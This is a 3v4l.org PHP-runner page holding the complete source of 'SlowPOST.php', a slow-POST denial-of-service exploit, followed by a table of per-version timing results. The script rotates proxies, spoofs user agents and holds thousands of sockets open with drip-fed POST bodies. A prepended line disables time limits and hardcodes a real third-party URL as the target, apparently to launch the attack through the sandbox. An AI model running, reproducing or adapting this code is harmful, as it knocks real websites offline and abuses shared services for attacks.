3v4l.org

run code in 300+ PHP versions simultaneously
<?php set_time_limit(0); ignore_user_abort(true); $_SERVER['argv'][1] = 'http://support.ioncube.com/winapp/'; ?><?php /** * Exploit Title: SlowPOST.php - POST Denial-Of-Service [v1.9.2] * * Date: 13.05.2013 * Author: NewEraCracker * License: Public Domain * * How to run using php command line: * Linux : php-cli SlowPOST.php * Windows : php SlowPOST.php * * This exploit might expose your IP Address in server logs. Be aware. */ //------------------------- // CONFiG //------------------------- $CONFIG['max_cookies'] = 20; $CONFIG['max_sockets'] = 9001; $CONFIG['timeout_ms'] = 500; $CONFIG['usleep_time'] = 10; //------------------------- // INiT //------------------------- // Define EXPLOIT_VERSION if(!defined('EXPLOIT_VERSION')) define('EXPLOIT_VERSION', 'v1.9.2'); // Define STDIN if(!defined('STDIN')) define('STDIN', fopen('php://stdin', 'r')); // Check PHP Version if(version_compare(PHP_VERSION, '5.0.4') < 0) { echo 'This support only supports PHP 5.0.4 and higher.'; exit(1); } // Globals - DO NOT EDIT $global_proxy_array = array(); //------------------------- // FUNCTiONS FOR THE LULZ //------------------------- /** Read STDIN and return it */ function readSTDIN() { $file = STDIN; if(!$file) return false; return trim(fgets($file)); } /** Receive a filename that has proxies listed in it and fills the $global_proxy_array */ function proxyLoadFile($filename) { global $global_proxy_array; // Load proxy list file $filename = str_replace('\\', '/', $filename); $content = @file_get_contents($filename); if(!$filename || !$content) { echo $filename.' is not a valid proxy-list file!'; exit(1); } $content = str_replace(array("\r\n", "\r"), "\n", $content); $content = explode("\n", $content); // Grab the proxies foreach($content as $value) { $tmp = explode(':', $value); if(isset($tmp[0], $tmp[1])) { $tmp[0] = trim($tmp[0]); $tmp[1] = (int)(trim($tmp[1])); // The proxy $global_proxy_array[] = array('host' => $tmp[0], 'port' => $tmp[1]); } } } /** Returns a random a proxy */ function proxyGetRandom() { global $global_proxy_array; // Give a random proxy if(count($global_proxy_array)) { $proxy = null; while(!$proxy) { $rand = mt_rand(0, count($global_proxy_array) - 1); $proxy = (isset($global_proxy_array[$rand]) ? $global_proxy_array[$rand] : null); } return $proxy; } return false; } /** Returns a random useragent */ function randomUserAgent() { // Microsoft Windows versions $os = array('5.0', '5.1', '5.2', '6.0', '6.1', '6.2'); // Select a random version $os = $os[mt_rand(0, count($os) - 1)]; // Select a random browser if(mt_rand(0, 1)) { // Internet Explorer versions $ua[0] = array('4.0', '7.0', '4.0'); $ua[1] = array('4.0', '8.0', '4.0'); $ua[2] = array('5.0', '9.0', '5.0'); $ua[3] = array('5.0', '10.0', '6.0'); // Random IE $ua = $ua[mt_rand(0, count($ua) - 1)]; return "Mozilla/{$ua[0]} (compatible; MSIE {$ua[1]}; Windows NT {$os}; Trident/{$ua[2]})"; } else { // Mozilla Firefox versions $ua = array('17.0', '18.0', '19.0', '20.0', '21.0'); // Random FF $ua = $ua[mt_rand(0, count($ua) - 1)]; return "Mozilla/5.0 (Windows NT {$os}; rv:{$ua}) Gecko/20100101 Firefox/{$ua}"; } } /** Opens a custom socket and returns it */ function openCustomSocket($newEraUrl, $newEraProxy = null) { global $CONFIG; @ini_set('default_socket_timeout', 1); $newEraConnection = (($newEraProxy == null) ? $newEraUrl : $newEraProxy); $host = (($newEraConnection->ssl) ? 'ssl://' : 'tcp://').$newEraConnection->name; $fp = @fsockopen($host, $newEraConnection->port); if(!$fp) return false; stream_set_blocking($fp, 0); stream_set_timeout($fp, 0, $CONFIG['timeout_ms']); return $fp; } /** * Receives a socket and performs the start of a slowPosting * Returns Content-Length on success and false on failure */ function slowPostStart($sock, $newEraUrl, $newEraProxy, $cookie) { // Check the socket if(!$sock) return false; // Generate a random Content-Length $length = mt_rand(1337, 133700); // Build $header = 'POST '.($newEraProxy ? $newEraUrl->full_url : $newEraUrl->path).' HTTP/1.1'."\r\n"; $header .= 'Host: '.$newEraUrl->name."\r\n"; $header .= 'Connection: Keep-Alive'."\r\n"; $header .= 'Accept: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'."\r\n"; $header .= 'User-Agent: '.randomUserAgent()."\r\n"; $header .= 'Accept-Language: en-US;q=0.8,en;q=0.6'."\r\n"; $header .= 'Accept-Encoding: gzip,deflate'."\r\n"; $header .= 'Keep-Alive: '.mt_rand(60, 120)."\r\n"; $header .= 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8'."\r\n"; $header .= mt_rand(0, 1) ? 'Referer: '.$newEraUrl->full_url."\r\n" : ''; $header .= ($cookie ? "Cookie: {$cookie}\r\n" : ''); $header .= 'Content-Length: '.$length."\r\n"; $header .= "\r\n"; // Do it @fwrite($sock, $header); return $length; } /** Receives a socket and continues the slowPosting */ function slowPostContinue($sock, $bytes = 5) { global $CONFIG; // Check the socket if(!$sock) return false; // Check the $bytes if(intval($bytes) != $bytes) $bytes = 5; // Throttle execution speed slightly if($CONFIG['usleep_time'] > 0) @usleep($CONFIG['usleep_time']); // Do it :D $tmp = ''; for($j = 0; $j < $bytes; $j++) $tmp .= chr(mt_rand(33, 126)); @fwrite($sock, urlencode($tmp)); return true; } //------------------------- // CLASSES FOR THE LULZ //------------------------- /** I want cookies! Give me cookies! */ class NewEraCookies { private $max_cookies; private $cookies = array(); /** Constructor */ public function __construct($newEraUrl, $newEraProxy, $max_cookies, $proxyFile = null, $output = false) { $this->update_object($newEraUrl, $newEraProxy, $max_cookies, $proxyFile, $output); } /** Object updater */ public function update_object($newEraUrl, $newEraProxy, $max_cookies, $proxyFile = null, $output = false) { $this->max_cookies = $max_cookies; $this->cookies = array(); if($output) echo PHP_EOL.'BUILDING COOKIES '; for($i = 0; $i < $this->max_cookies; $i++) { // Using Proxy file? if($proxyFile) { $newproxy = proxyGetRandom(); if(!$newproxy) exit($proxyFile.' is not a valid proxy-list file!'); $newEraProxy->update_object('tcp://'.$newproxy['host'].':'.$newproxy['port']); } $this->cookies[$i] = self::cookieGrab($newEraUrl, $newEraProxy); if($output) echo '.'; } } /** Returns a cookie by its index */ public function returnCookieByIndex($idx) { if($idx == 'random') $idx = mt_rand(0, $this->max_cookies - 1); if(isset($this->cookies[$idx])) return $this->cookies[$idx]; return ''; } /** Function to parse set-cookie from header fields */ public static function cookieParse($header) { $cookies = array(); foreach($header as $line) { if(preg_match('/^Set-Cookie: /i', $line)) { $line = preg_replace('/^Set-Cookie: /i', '', trim($line)); $csplit = explode(';', $line); $cdata = array(); $grabbed_cookie_data = false; foreach($csplit as $data) { $cinfo = explode('=', $data); $cinfo[0] = trim($cinfo[0]); if(!$grabbed_cookie_data) { $cdata['value']['key'] = $cinfo[0]; $cdata['value']['value'] = $cinfo[1]; $grabbed_cookie_data = true; continue; } $cinfo[0] = strtolower($cinfo[0]); if($cinfo[0] == 'expires') $cinfo[1] = @strtotime($cinfo[1]); if($cinfo[0] == 'secure') $cinfo[1] = 'true'; if(in_array($cinfo[0], array('domain', 'expires', 'path', 'secure', 'comment'))) { $cdata[$cinfo[0]] = $cinfo[1]; } } $cookies[] = $cdata; } } return $cookies; } /** Function to build the request cookie header from parsed set-cookie data */ public static function cookieBuild($data) { if(is_array($data)) { $cookie = array(); foreach($data as $d) $cookie[] = $d['value']['key'].'='.$d['value']['value']; if(count($cookie) > 0) return trim(implode('; ', $cookie)); } return false; } /** Function to grab cookies from an url using PHP's fopen */ public static function cookieGrab($newEraUrl, $newEraProxy = null) { // Build connection header $header = 'Host: '.$newEraUrl->name."\r\n"; $header .= 'Connection: Keep-Alive'."\r\n"; $header .= 'Accept: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'."\r\n"; $header .= 'User-Agent: '.randomUserAgent()."\r\n"; $header .= 'Accept-Language: en-US;q=0.8,en;q=0.6'."\r\n"; $header .= 'Accept-Encoding: gzip,deflate'."\r\n"; $header .= 'Keep-Alive: '.mt_rand(60, 120)."\r\n"; // Check proxy url if($newEraProxy) { // Enable proxy $proxy_url = $newEraProxy->full_url; $request_fulluri = true; } else { // Disable proxy $proxy_url = ''; $request_fulluri = false; } // Build stream context $context = stream_context_create(array( 'http' => array( 'method' => 'GET', 'timeout' => (3), 'header' => $header, 'proxy' => $proxy_url, 'request_fulluri' => $request_fulluri, 'max_redirects' => (0), 'protocol_version' => (1.1), 'ignore_errors' => true ), 'ssl' => array( 'verify_peer' => false ) )); // Let the fun begin $cookie = ''; $handle = @fopen($newEraUrl->full_url, 'r', false, $context); // I hope this does work if($handle) { // If it worked, we grab the cookies $metadata = stream_get_meta_data($handle); $cookie = self::cookieBuild(self::cookieParse($metadata['wrapper_data'])); // Fun is only at a small distance @fclose($handle); } return $cookie; } } /** Class to construct and handle an url-like object */ class NewEraUrl { private $host_full_url; private $host_protocol; private $host_ssl; private $host_name; private $host_port; private $host_path; /** Constructor */ public function __construct($host_full_url) { $this->update_object($host_full_url); } /** Object updater */ public function update_object($host_full_url) { $this->host_full_url = $host_full_url; $this->host_ssl = ((strpos($this->host_full_url, 'https') === 0) ? true : false); $this->host_protocol = ($this->host_ssl ? 'https' : 'http'); // Grab other parameters $host_full_url = explode('/', $host_full_url, 4); $host_full_url[2] = explode(':', $host_full_url[2], 2); // Host, Port, Path $this->host_name = $host_full_url[2][0]; $this->host_port = (isset($host_full_url[2][1]) ? $host_full_url[2][1] : ($this->host_ssl ? 443 : 80)); $this->host_path = '/'.(isset($host_full_url[3]) ? $host_full_url[3] : ''); } /** Getter for the private properties */ public function __get($var) { $var = 'host_'.$var; if(isset($this->{$var})) return $this->{$var}; } /** Quick check to see if url is minimally valid */ public static function isValid($host_full_url) { if(strpos($host_full_url, 'https://') === 0 || strpos($host_full_url, 'http://') === 0) return true; } } /** Class to construct and handle a proxy-like object */ class NewEraProxy { private $proxy_full_url; private $proxy_protocol; private $proxy_ssl; private $proxy_name; private $proxy_port; /** Constructor */ public function __construct($proxy_full_url) { $this->update_object($proxy_full_url); } /** Object updater */ public function update_object($proxy_full_url) { $this->proxy_full_url = $proxy_full_url; $this->proxy_ssl = ((strpos($this->proxy_full_url, 'ssl') === 0) ? true : false); $this->proxy_protocol = ($this->proxy_ssl ? 'ssl' : 'tcp'); // Grab other parameters if(false !== ($tmp = strpos($proxy_full_url, '://'))) $proxy_full_url = substr($proxy_full_url, $tmp + 3); $proxy_full_url = explode(':', $proxy_full_url); // Host, Port, Path $this->proxy_name = $proxy_full_url[0]; $this->proxy_port = (int)(isset($proxy_full_url[1]) ? $proxy_full_url[1] : ($this->proxy_ssl ? '443' : '80')); } /** Getter for the private properties */ public function __get($var) { $var = 'proxy_'.$var; if(isset($this->{$var})) return $this->{$var}; } } //------------------------- // MAiN CODE FOR THE LULZ //------------------------- echo " _______. __ ______ ____ __ ____ / || | / __ \ \ \ / \ / / | (----`| | | | | | \ \/ \/ / \ \ | | | | | | \ / .----) | | `----.| `--' | \ /\ / |_______/ |_______| \______/ \__/ \__/ .______ ______ _______.___________. | _ \ / __ \ / | | | |_) | | | | | | (----`---| |----` | ___/ | | | | \ \ | | | | | `--' | .----) | | | | _| \______/ |_______/ |__| "; echo PHP_EOL.EXPLOIT_VERSION.' by NewEraCracker'.PHP_EOL; // Fetch the URL to attack $url = null; if(isset($_SERVER['argv'][1]) && NewEraUrl::isValid($_SERVER['argv'][1])) $url = $_SERVER['argv'][1]; // Fetch proxy to use $proxy['host'] = null; $proxy['port'] = null; $proxy['file'] = false; if(!empty($url) && isset($_SERVER['argv'][2])) { if($proxy = explode(':', $_SERVER['argv'][2])) { if(isset($proxy[0], $proxy[1])) { $proxy['file'] = false; $proxy['host'] = $proxy[0]; $proxy['port'] = (int)($proxy[1]); unset($proxy[0], $proxy[1]); } } if(!(isset($proxy['host'], $proxy['port'])) && is_readable($_SERVER['argv'][2])) { $proxy['file'] = true; $proxy['filename'] = $_SERVER['argv'][2]; } } // Ask for proxy if(empty($url) && (empty($proxy['host']) || empty($proxy['port'])) && !$proxy['file']) { $proxy['use'] = null; while(!$proxy['use']) { echo PHP_EOL.'Do you want to use a proxy [yes/no/file]: '; $proxy['use'] = readSTDIN(); if(strpos(strtolower($proxy['use']), 'n') === 0) { break; } elseif(strpos(strtolower($proxy['use']), 'y') === 0) { echo PHP_EOL.'Proxy IP: '; $proxy['host'] = readSTDIN(); echo PHP_EOL.'Proxy Port: '; $proxy['port'] = (int)(readSTDIN()); } elseif(strpos(strtolower($proxy['use']), 'f') === 0) { echo PHP_EOL.'Proxy file: '; $proxy['filename'] = readSTDIN(); if(is_readable($proxy['filename'])) { $proxy['file'] = true; } else { echo PHP_EOL.'Invalid file!'.PHP_EOL; $proxy['use'] = null; } } else { $proxy['use'] = null; echo PHP_EOL.'Invalid choice!'.PHP_EOL; } } unset($proxy['use']); } // Ask for target URL while(!$url) { echo PHP_EOL.'Target url: '; $url = readSTDIN(); if(NewEraUrl::isValid($url)) break; $url = null; echo PHP_EOL.'Invalid target!'.PHP_EOL; } // Init proxy suport if(empty($proxy['host']) || empty($proxy['port'])) { $newEraProxy = null; if(!empty($proxy['file'])) { proxyLoadFile($proxy['filename']); $newproxy = proxyGetRandom(); if(!$newproxy) exit($proxy['filename'].' is not a valid proxy-list file!'); $newEraProxy = new NewEraProxy('tcp://'.$newproxy['host'].':'.$newproxy['port']); } } else { $newEraProxy = new NewEraProxy('tcp://'.$proxy['host'].':'.$proxy['port']); } // Init the others $newEraUrl = new NewEraUrl($url); $newEraCookies = new NewEraCookies($newEraUrl, $newEraProxy, $CONFIG['max_cookies'], $proxy['file'], true); // Start echo PHP_EOL.'IMMA FIRIN MAH LAZOR '; $fp = array(); // Do it while(1) { for($i = 0; $i < $CONFIG['max_sockets']; $i++) { // Using Proxy file? if($proxy['file']) { $newproxy = proxyGetRandom(); if(!$newproxy) exit($proxy['filename'].' is not a valid proxy-list file!'); $newEraProxy->update_object('tcp://'.$newproxy['host'].':'.$newproxy['port']); } // Open a new socket $tmp = array(); if($tmp['sock'] = openCustomSocket($newEraUrl, $newEraProxy)) { // Progress bar echo '.'; // Start a new slowPost and find its length if($tmp['length'] = slowPostStart($tmp['sock'], $newEraUrl, $newEraProxy, $newEraCookies->returnCookieByIndex('random'))) { if(isset($fp[$i], $fp[$i]['sock'])) { // Close connection in the global socket array if it is being used @fclose($fp[$i]['sock']); unset($fp[$i]); } // Save the new socket in the global socket array $fp[$i] = $tmp; } else { // Epic fail? @fclose($tmp['sock']); } } unset($tmp); // Check the current sockets foreach($fp as $k => $v) { if($fp[$k]['length'] > 0) { // Contine old slowPosts $tmp = ($fp[$k]['length'] < 5) ? $fp[$k]['length'] : 5; slowPostContinue($fp[$k]['sock'], $tmp); $fp[$k]['length'] -= $tmp; } else { // Close completed slowPosts @fclose($fp[$k]['sock']); unset($fp[$k]); } } } } ?>

Here you find the average performance (time & memory) of each version. A grayed out version indicates it didn't complete successfully (based on exit-code).

VersionSystem time (s)User time (s)Memory (MiB)
8.3.41.1590.84319.29
8.3.31.1200.88420.77
8.3.21.2200.78320.71
8.3.11.1190.88222.47
8.3.01.2200.78322.83
8.2.171.1670.83722.96
8.2.161.2620.73922.39
8.2.151.1600.84324.18
8.2.141.2960.70624.66
8.2.131.2330.77026.16
8.2.121.2660.73621.07
8.2.111.1590.84219.61
8.2.101.0260.97618.28
8.2.90.5961.40619.58
8.2.80.6521.34818.53
8.2.70.6401.36318.13
8.2.60.6031.39818.05
8.2.50.6981.30118.13
8.2.40.7061.30520.01
8.2.30.6541.35019.83
8.2.20.6331.36918.27
8.2.10.6161.38518.30
8.2.00.6431.35918.25
8.1.271.2450.75623.99
8.1.261.1600.84326.35
8.1.251.3390.66328.09
8.1.241.1120.88922.70
8.1.231.0350.96521.26
8.1.220.7031.29918.77
8.1.210.7631.23919.47
8.1.200.6461.35717.73
8.1.190.6201.38417.91
8.1.180.6331.37018.10
8.1.170.6531.34919.09
8.1.160.6831.31819.45
8.1.150.7011.30619.21
8.1.140.6801.32318.03
8.1.130.7461.25518.34
8.1.120.6131.38917.88
8.1.110.6871.31718.03
8.1.100.6131.38917.80
8.1.90.6271.37717.80
8.1.80.6531.35018.05
8.1.70.6991.30217.94
8.1.60.5761.42618.02
8.1.50.5761.42617.95
8.1.40.6201.38317.86
8.1.30.6161.38618.02
8.1.20.6391.36118.13
8.1.10.5731.42818.01
8.1.00.6401.36317.96
8.0.300.6981.30920.45
8.0.290.6461.35617.54
8.0.280.6521.35718.80
8.0.270.6461.35517.76
8.0.260.6901.31317.21
8.0.250.6921.30817.48
8.0.240.6961.30617.33
8.0.230.6791.32217.38
8.0.220.6291.37217.32
8.0.210.5871.41617.36
8.0.200.6631.34017.50
8.0.190.6501.35217.40
8.0.180.6091.39217.37
8.0.170.6631.33917.30
8.0.160.5491.45217.47
8.0.150.6001.40317.32
8.0.140.6121.38617.25
8.0.130.5461.45613.92
8.0.121.4450.47617.39
8.0.111.4400.50517.38
8.0.101.4700.48917.39
8.0.91.5100.44617.33
8.0.81.2870.55817.39
8.0.71.4740.49517.21
8.0.61.5140.45517.28
8.0.51.4710.47617.34
8.0.31.4910.45717.50
8.0.21.5030.46217.46
8.0.11.5230.42417.39
8.0.01.5010.46717.29
7.4.330.6161.38615.00
7.4.320.5631.43816.82
7.4.300.5901.41216.79
7.4.290.6201.38316.75
7.4.280.5231.47916.89
7.4.270.5561.44516.87
7.4.260.5361.46413.77
7.4.251.4910.43616.87
7.4.241.4880.45816.89
7.4.231.4320.52416.93
7.4.221.3160.63516.91
7.4.211.3340.60616.88
7.4.201.4820.45016.77
7.4.191.4970.45917.06
7.4.161.5010.45517.05
7.4.151.4670.48117.40
7.4.141.4720.48817.86
7.4.131.4690.50316.97
7.4.121.4770.49216.97
7.4.111.5350.53316.93
7.4.101.5240.51216.86
7.4.91.5060.57116.94
7.4.81.3970.51419.39
7.4.71.3540.62917.04
7.4.61.4760.51617.00
7.4.51.4910.43216.69
7.4.41.4360.59422.77
7.4.31.0600.43117.10
7.3.330.5601.44213.94
7.3.320.5821.41813.84
7.3.311.4240.49916.86
7.3.301.4910.47816.86
7.3.291.3400.60616.82
7.3.281.3200.54816.87
7.3.271.5040.45617.40
7.3.261.4460.51216.80
7.3.251.4710.48616.86
7.3.241.4850.48216.83
7.3.231.4870.55716.91
7.3.211.3290.48316.93
7.3.201.3790.60219.39
7.3.191.4620.53616.98
7.3.181.3640.64816.80
7.3.171.4170.57716.89
7.3.161.4360.53117.02
7.2.331.6070.45517.27
7.2.321.2960.56417.23
7.2.311.3840.61117.23
7.2.301.4780.53017.10
7.2.291.4650.54516.96
5.4.221.9900.49019.71
5.4.211.9900.49019.87
5.4.201.9700.51319.74
5.4.191.9870.49719.74
5.4.181.9430.54019.88
5.4.171.9670.51719.75
5.4.161.9130.56719.89
5.4.151.9800.50019.73
5.4.141.8630.61717.07
5.4.132.0100.47317.30
5.4.121.9570.52717.22
5.4.112.0230.45317.06
5.4.102.0030.47717.16
5.4.92.0300.45317.19
5.4.81.9800.50317.17
5.4.71.9700.51317.10
5.4.62.0370.44717.14
5.4.52.0230.46017.31
5.4.41.9870.49717.15
5.4.31.9900.49317.16
5.4.21.7700.71017.12
5.4.11.8430.63717.13
5.4.01.9000.58016.69
5.3.272.0270.45715.25
5.3.261.8370.64315.11
5.3.251.9230.55715.25
5.3.241.8800.60015.26
5.3.231.9930.49015.26
5.3.222.0030.48015.22
5.3.212.0000.48315.07
5.3.202.0000.47715.22
5.3.191.9300.55315.03
5.3.182.0470.43714.97
5.3.171.9330.55015.06
5.3.162.0000.48315.15
5.3.151.9770.50715.13
5.3.141.9730.51014.98
5.3.131.8030.67715.19
5.3.121.8130.66715.27
5.3.111.8830.60015.21
5.3.101.8330.64714.54
5.3.91.9470.53314.63
5.3.81.9600.51714.66
5.3.71.9800.49714.58
5.3.61.9870.49714.66
5.3.51.9930.49014.37
5.3.42.0130.46714.52
5.3.32.0030.47714.39
5.3.21.9530.53014.41
5.3.12.0230.46014.16
5.3.01.9770.50714.21

preferences:
43.51 ms | 400 KiB | 5 Q